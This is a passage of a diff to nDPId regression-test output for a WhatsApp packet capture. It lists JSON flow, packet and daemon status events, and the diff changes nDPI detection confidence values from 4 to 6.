-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655054457330,"flow_last_seen":1655054457533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655062569674,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655062569330,"flow_last_seen":1655062569427,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655062569427,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655054457330,"flow_last_seen":1655054457533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655062569674,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":274,"packets-processed":273,"total-skipped-flows":0,"total-l4-payload-len":23564,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":34,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":34,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":226,"global_ts_msec":1655063661893} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655063661893,"flow_last_seen":1655063661893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655063661893,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1655063661893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655063661893,"pkt":"eJS0JASgYDjgxTWgCABFAAA86plAAD8GF7jAqAJkszzDIaAeFGY4VRBmAAAAAKAC\/\/\/+RwAAAgQFtAQCCAoF0w05AAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1655063661925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655063661925,"pkt":"eJS0JASgYDjgxTWgCABFAAA06ppAAD8GF7\/AqAJkszzDIaAeFGY4VRBnHmH5pIAQAKyJNgAAAQEICgXTDVr1t5VE"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1655063661926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655063661926,"pkt":"eJS0JASgYDjgxTWgCABFAAA46ptAAD8GF7rAqAJkszzDIaAeFGY4VRBnHmH5pIAYAKxD5AAAAQEICgXTDVv1t5VERUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655063661893,"flow_last_seen":1655063661927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655063661927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655063661893,"flow_last_seen":1655063661927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655063661927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":282,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":282,"packets-processed":281,"total-skipped-flows":0,"total-l4-payload-len":24837,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":35,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":35,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":232,"global_ts_msec":1655064434682} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655064434682,"flow_last_seen":1655064434682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655064434682,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1655064434682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655064434682,"pkt":"eJS0JASgYDjgxTWgCABFAAA8Z49AAD8GmrLAqAJkszzDMbDqFGZ3oUxiAAAAAKAC\/\/\/KHwAAAgQFtAQCCArGt\/RXAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1655064434714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655064434714,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Z5BAAD8GmrnAqAJkszzDMbDqFGZ3oUxjZjrG2IAQAKzrtwAAAQEICsa39HeqpjSg"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1655064434759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655064434759,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Z5FAAD8GmrTAqAJkszzDMbDqFGZ3oUxjZjrG2IAYAKymOQAAAQEICsa39KSqpjSgRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655064434682,"flow_last_seen":1655064434792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655064434792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655056441533,"flow_last_seen":1655056441715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655064435041,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655064434682,"flow_last_seen":1655064434792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655064434792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655056441533,"flow_last_seen":1655056441715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655064435041,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":290,"packets-processed":289,"total-skipped-flows":0,"total-l4-payload-len":25160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":36,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":36,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":239,"global_ts_msec":1655065264797} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655065264797,"flow_last_seen":1655065264797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655065264797,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1655065264797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655065264797,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ttVAAD8GS2zAqAJkszzDMclYFGbchY4CAAAAAKAC\/\/8wGwAAAgQFtAQCCApH\/04jAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1655065264828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655065264828,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ttZAAD8GS3PAqAJkszzDMclYFGbchY4DukzwuYAQAVeNLQAAAQEICkf\/TkbK+lov"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1655065265098,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655065265098,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ttdAAD8GS27AqAJkszzDMclYFGbchY4DukzwuYAYAVdG0gAAAQEICkf\/T1DK+lovRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065264797,"flow_last_seen":1655065265128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655065265128,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065264797,"flow_last_seen":1655065265128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655065265128,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":298,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":298,"packets-processed":297,"total-skipped-flows":0,"total-l4-payload-len":25440,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":37,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":37,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":245,"global_ts_msec":1655065885451} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655065885451,"flow_last_seen":1655065885451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655065885451,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1655065885451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655065885451,"pkt":"eJS0JASgYDjgxTWgCABFAAA8arBAAD8Gl5HAqAJkszzDMbtMFGZqrJ7gAAAAAKAC\/\/9fsQAAAgQFtAQCCApxKmRoAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1655065885484,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655065885484,"pkt":"eJS0JASgYDjgxTWgCABFAAA0arFAAD8Gl5jAqAJkszzDMbtMFGZqrJ7h+p4p8oAQAIDu2wAAAQEICnEqZIk6KEA5"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1655065885533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655065885533,"pkt":"eJS0JASgYDjgxTWgCABFAAA4arJAAD8Gl5PAqAJkszzDMbtMFGZqrJ7h+p4p8oAYAICpZQAAAQEICnEqZK46KEA5RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885451,"flow_last_seen":1655065885566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655065885566,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885451,"flow_last_seen":1655065885566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655065885566,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655065885823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655065885823,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ghFAAD8GgDDAqAJkszzDMcoMFGZjsgDIAAAAAKAC\/\/8NZwAAAgQFtAQCCApICHYoAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655065885823,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ghJAAD8GgDfAqAJkszzDMcoMFGZjsgDJIofjooAQAVdpNQAAAQEICkgIdkmT2Dd0"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655065885823,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ghNAAD8GgDLAqAJkszzDMcoMFGZjsgDJIofjooAYAVcjvgAAAQEICkgIdm+T2Dd0RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655065885823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655065885823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":313,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":313,"packets-processed":312,"total-skipped-flows":0,"total-l4-payload-len":26320,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":39,"total-detection-updates":0,"total-updates":0,"current-active-flows":10,"total-active-flows":39,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":256,"global_ts_msec":1655067574156} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655067574156,"flow_last_seen":1655067574156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655067574156,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1655067574156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655067574156,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ZktAAD8Gm\/bAqAJkszzDMbEWFGZP\/CSfAAAAAKAC\/\/80aAAAAgQFtAQCCArGuNlKAAAAAAEDAwk="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1655067574187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655067574187,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ZkxAAD8Gm\/3AqAJkszzDMbEWFGZP\/CSg\/FJ4JoAQAKwGCgAAAQEICsa42a+DX2Qy"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1655067574192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655067574192,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Zk1AAD8Gm\/jAqAJkszzDMbEWFGZP\/CSg\/FJ4JoAYAKzAswAAAQEICsa42bSDX2QyRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655067574156,"flow_last_seen":1655067574223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655067574223,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":321,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655059510580,"flow_last_seen":1655059510757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655067574418,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 